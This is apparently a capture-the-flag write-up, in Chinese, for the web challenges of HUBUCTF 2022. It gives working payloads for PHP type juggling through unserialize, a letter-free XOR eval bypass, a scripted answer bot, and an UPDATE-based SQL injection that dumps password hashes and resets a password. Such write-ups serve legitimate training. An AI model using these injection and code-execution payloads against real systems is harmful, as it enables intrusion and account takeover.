HUBUCTF 2022 新生赛-WEB部分wp

目录

checkin

HowToGetShell

Calculate

ezsql

---

checkin

源代码：

<?php
show_source(__FILE__);
$username  = "this_is_secret"; 
$password  = "this_is_not_known_to_you"; 
include("flag.php");//here I changed those two 
$info = isset($_GET['info'])? $_GET['info']: "" ;
$data_unserialize = unserialize($info);
if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
    echo $flag;
}else{
    echo "username or password error!";

}

?>

这里是两个==,根据php弱类型，bool值和任何字符串都为相等，即可以构造username和password的值为bool。可以构建username和password的数组，其值可为bool的ture值。代码为

<?php
$data=[
    'username'=>true,
    'password'=>true,
];
$p1=serialize($data);
echo $p1;
//$p2=unserialize($p1);
?>
    最后输出a:2:{s:8:"username";b:1;s:8:"password";b:1;}

payload：

?info=a:2:{s:8:"username";b:1;s:8:"password";b:1;}

HowToGetShell

源代码：

<?php
show_source(__FILE__);
$mess=$_POST['mess'];
if(preg_match("/[a-zA-Z]/",$mess)){
    die("invalid input!");
}
eval($mess);

payload：

mess=$_="0302181"^"@[@[_^^";$_();

参考从一道CTF题目谈PHP中的命令执行-CSDN博客 

Calculate

python脚本（大佬那边拿来的）

import time

import requests
from lxml import etree

url = "http://node5.anna.nssctf.cn:28001/"
res1 = requests.session()

while True:
    res = res1.get(url)
    tree = etree.HTML(res.text)
    concat = ''
    divs = tree.xpath('/html/body/form/div/text()')
    del divs[-1]
    ans = concat.join(divs)
    print(ans)
    result = str(eval(ans))
    time.sleep(1)
    resp = res1.post(url=url, data={"ans": result})
    print(result)
    cnt = tree.xpath('/html/body/p[3]/text()')
    count = concat.join(cnt)
    print("cnt=====>", count)
    if "NSS" in resp.text:
        print(resp.text)
        break
    time.sleep(1)

ezsql

快速方法

账号：admin

密码：iamcool

常规方法

update注入

注册登入发现可以更新个人信息 其中age字段存在update注入，可通过描述字段查看所需信息

1.nickname=hhh&age=23, description=(select 1)%23	// 1
2.nickname=hhh&age=23, description=(select database())%23	// 查看数据库   demo2
3.nickname=hhh&age=23, description=(select group_concat(table_name) from information_schema.tables where table_schema=database())%23	//查看表 users
4.nickname=hhh&age=23, description=(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)%23    //查看列 id,username,password,nickname,age,description		（注意此处users会导致更新错误 替换为url编码）
5.nickname=hhh&age=23, description=(select group_concat(password) users)%23	// 0cc175b9c0f1b6a831c399e269772661 为md5格式

 修改password

6. nickname=hhh&age=23, password=0x3230326362393632616335393037356239363462303731353264323334623730%23 // 0x32...30 == hex(md5('123'))